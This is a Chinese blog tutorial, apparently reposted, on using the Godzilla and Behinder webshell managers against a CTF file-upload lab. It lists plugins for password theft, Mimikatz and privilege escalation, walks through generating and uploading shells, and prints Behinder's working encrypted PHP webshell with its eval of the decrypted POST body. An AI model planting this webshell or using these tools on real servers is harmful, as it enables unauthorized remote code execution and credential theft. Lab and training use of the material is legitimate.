【原创 超详细】哥斯拉及冰蝎的简单使用

admin 2023年1月1日16:11:35评论626 views字数 2624阅读8分44秒阅读模式

[huayang]

实验环境均以 ctfshow— 文件上传 —web151 进行讲解

哥斯拉

下载地址:https://github.com/BeichenDream/Godzilla/releases/tag/v1.10-godzilla

官方文档

Godzilla

运行环境

  1. JavaDynamicPayload -> jre5 及以上
  2. CShapDynamicPayload -> .net2.0 及以上
  3. PhpDynamicPayload -> php5.0 及以上

简介

Payload 以及加密器支持

哥斯拉内置了 3 种 Payload 以及 6 种加密器,6 种支持脚本后缀,20 个内置插件

  1. JavaDynamicPayload
    1. JAVA_AES_BASE64
      1. jsp
      2. jspx
    2. JAVA_AES_RAW
      1. jsp
      2. jspx
  2. CShapDynamicPayload
    1. CSHAP_AES_BASE64
      1. aspx
      2. asmx
      3. ashx
    2. JAVA_AES_RAW
      1. aspx
      2. asmx
      3. ashx
  3. PhpDynamicPayload
    1. PHP_XOR_BASE64
      1. php
    2. PHP_XOR_RAW
      1. php

Raw or Base64 加密器区别

Raw : Raw 是将加密后的数据直接发送或者输出

【原创 超详细】哥斯拉及冰蝎的简单使用

Base64 : Base64 是将加密后的数据再进行 Base64 编码

【原创 超详细】哥斯拉及冰蝎的简单使用

插件支持

  1. JavaDynamicPayload
    1. MemoryShell

    支持 哥斯拉 冰蝎 菜刀 ReGeorg 的内存shell 并且支持卸载

    1. Screen

    屏幕截图

    1. JRealCmd

    虚拟终端 可以用netcat连接

    1. JMeterpreter

    与MSF联动

    1. ServletManage

    Servlet管理 Servlet卸载

    1. JarLoader

    内存加载Jar 将Jar加载到 SystemClassLoader

    1. JZip

    ZIP压缩 ZIP解压

  2. CShapDynamicPayload
    1. CZip

    ZIP压缩 ZIP解压

    1. ShellcodeLoader

    Shellcode加载 与MSF联动

    1. SafetyKatz

    Mimikatz

    1. lemon

    读取服务器 FileZilla navicat sqlyog Winscp xmangager 的配置信息以及密码

    1. CRevlCmd

    虚拟终端 可以用netcat连接

    1. BadPotato

    Windows权限提升 2012-2019

    1. ShapWeb

    读取服务器 谷歌 IE 火狐 浏览器保存的账号密码

    1. SweetPotato

    Windwos权限提升 烂土豆的C#版本 甜土豆

  3. PhpDynamicPayload
    1. PMeterpreter

    与MSF联动

    1. ByPassOpenBasedir

    绕过OpenBasedir

    1. PZip

    ZIP压缩 ZIP解压

    1. P_Eval_Code

    代码执行

    1. BypassDisableFunctions

    绕过 DisableFunctions

基本用法 问题 & 解决办法

问题

打开界面

【原创 超详细】哥斯拉及冰蝎的简单使用

上传一句话

【原创 超详细】哥斯拉及冰蝎的简单使用
【原创 超详细】哥斯拉及冰蝎的简单使用

进行连接 目标 -> 添加

【原创 超详细】哥斯拉及冰蝎的简单使用

点击测试发现无法成功

【原创 超详细】哥斯拉及冰蝎的简单使用

解决办法

点击 管理 -> 生成

【原创 超详细】哥斯拉及冰蝎的简单使用

自行更改配置

【原创 超详细】哥斯拉及冰蝎的简单使用

我在本地生成一个 shell 文件

【原创 超详细】哥斯拉及冰蝎的简单使用

把这个文件改为 php 文件并上传至服务器

【原创 超详细】哥斯拉及冰蝎的简单使用

这下我们进行连接,上面自行更改的信息别错了

【原创 超详细】哥斯拉及冰蝎的简单使用

测试成功

【原创 超详细】哥斯拉及冰蝎的简单使用

添加然后右键点击进入

【原创 超详细】哥斯拉及冰蝎的简单使用
【原创 超详细】哥斯拉及冰蝎的简单使用

更多骚姿势:https://blog.csdn.net/qq_39997096/article/details/111168949

冰蝎

下载地址:https://github.com/rebeyond/Behinder/releases/tag/Behinder_v3.0_Beta_6

官方文档

Behinder

“冰蝎” 动态二进制加密网站管理客户端

功能介绍原文链接:

《利用动态二进制加密实现新型一句话木马之客户端篇》 https://xz.aliyun.com/t/2799

工作原理原文链接:

《利用动态二进制加密实现新型一句话木马之 Java 篇》 https://xz.aliyun.com/t/2744

《利用动态二进制加密实现新型一句话木马之.NET 篇》 https://xz.aliyun.com/t/2758

《利用动态二进制加密实现新型一句话木马之 PHP 篇》 https://xz.aliyun.com/t/2774

运行环境

客户端:jre8+
服务端:.net 2.0+;php 5.3-7.4;java 6+

FAQ

  • 直接用浏览器访问 shell 会报错?客户端附带的服务端为最简版本,没有做容错处理,所以直接浏览器访问可能会报错,但是不影响客户端正常连接。如果不介意服务端体积增加几个字节,可以自己加一些容错判断语句。
  • 我可以对 shell 进行修改么?客户端附带的服务端可以进行各种变形,只要基本逻辑不变,客户端即可正常连接。
  • 开了 socks 代理,但是服务器并没有开启代理端口?socks 代理的端口不是开在远程服务器上的,是开在本地的,利用 socks 客户端直接连接本地 IP 的代理端口即可,冰蝎会把本地端口的流量通过 http 隧道透传至远程服务器网络。

使用方法

冰蝎有自带的码,上传至服务器

冰蝎 ->server

【原创 超详细】哥斯拉及冰蝎的简单使用
<?php@error_reporting(0);session_start();    $key="2591c98b70119fe6"; //该密钥为连接密码32位md5值的前16位,默认连接密码shell	$_SESSION['k']=$key;	$post=file_get_contents("php://input");	if(!extension_loaded('openssl'))	{		$t="base64_"."decode";		$post=$t($post."");		for($i=0;$i<strlen($post);$i++) {    			 $post[$i] = $post[$i]^$key[$i+1&15];    			}	}	else	{		$post=openssl_decrypt($post, "AES128", $key);	}    $arr=explode('|',$post);    $func=$arr[0];    $params=$arr[1];	class C{public function __invoke($p) {eval($p."");}}    @call_user_func(new C(),$params);?>
【原创 超详细】哥斯拉及冰蝎的简单使用

一句话是不行的哦

【原创 超详细】哥斯拉及冰蝎的简单使用

执行一下命令看看是否真正成功

【原创 超详细】哥斯拉及冰蝎的简单使用

为什么这么说,看看下面的问题

问题

这东西很扯

在 ctfshow 环境会显示连接成功但是没有数据

而 ctfhub 就可以

ctfshow

【原创 超详细】哥斯拉及冰蝎的简单使用
【原创 超详细】哥斯拉及冰蝎的简单使用
【原创 超详细】哥斯拉及冰蝎的简单使用

ctfhub

【原创 超详细】哥斯拉及冰蝎的简单使用
【原创 超详细】哥斯拉及冰蝎的简单使用

所以老版的一句话只能搞搞 ctf 了

现在都是利用动态二进制加密实现新型一句话木马

自带 key 值

[/huayang]

FROM:浅浅淡淡[hellohy]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月1日16:11:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【原创 超详细】哥斯拉及冰蝎的简单使用https://cn-sec.com/archives/1493762.html

发表评论

匿名网友 填写信息